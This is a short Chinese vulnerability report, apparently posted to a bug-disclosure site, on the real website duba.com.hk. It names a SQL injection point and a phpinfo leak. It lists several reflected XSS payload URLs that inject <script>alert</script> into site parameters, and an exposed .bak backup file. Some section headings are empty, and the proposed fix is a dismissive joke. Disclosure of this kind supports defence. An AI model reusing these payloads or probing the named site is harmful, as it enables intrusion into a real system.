1、SQL注入漏洞：
漏洞点：http://www.duba.com.hk:80/support_3_view.php?id=5
 
 







2、一些敏感后台URL：
 
 
 
 
3、敏感信息泄漏：duba.hk.phpinfo.htm www.2cto.com
 
 
 
 
4、文件目录遍历：
 
 
 
 
5、XSS跨站脚本攻击：
http://www.duba.com.hk:80/purchase_content.php?type=B"><script>alert(42873);</sCript>
 
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&snid=12345<script>alert(42873)</script>
 
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&email=hacker@hacker.org<script>alert(42873)</script>
 
http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&sale_company=nosec<script>alert(42873)</script>
 
http://www.duba.com.hk:80/faq.php?cid=1"><script>alert(42873);</sCript>
 
http://www.duba.com.hk:80/support_1.php?cid=1"><script>alert(42873);</sCript>
 
http://www.duba.com.hk:80/support_3_view.php?id=5<script>alert(42873);</sCript>
 
6、网站页面文件备份游览：
http://www.duba.com.hk:80/index.php.bak
 
 
 
 
修复方案：你们懂的啦。
版权声明：转载请注明来源 小蝎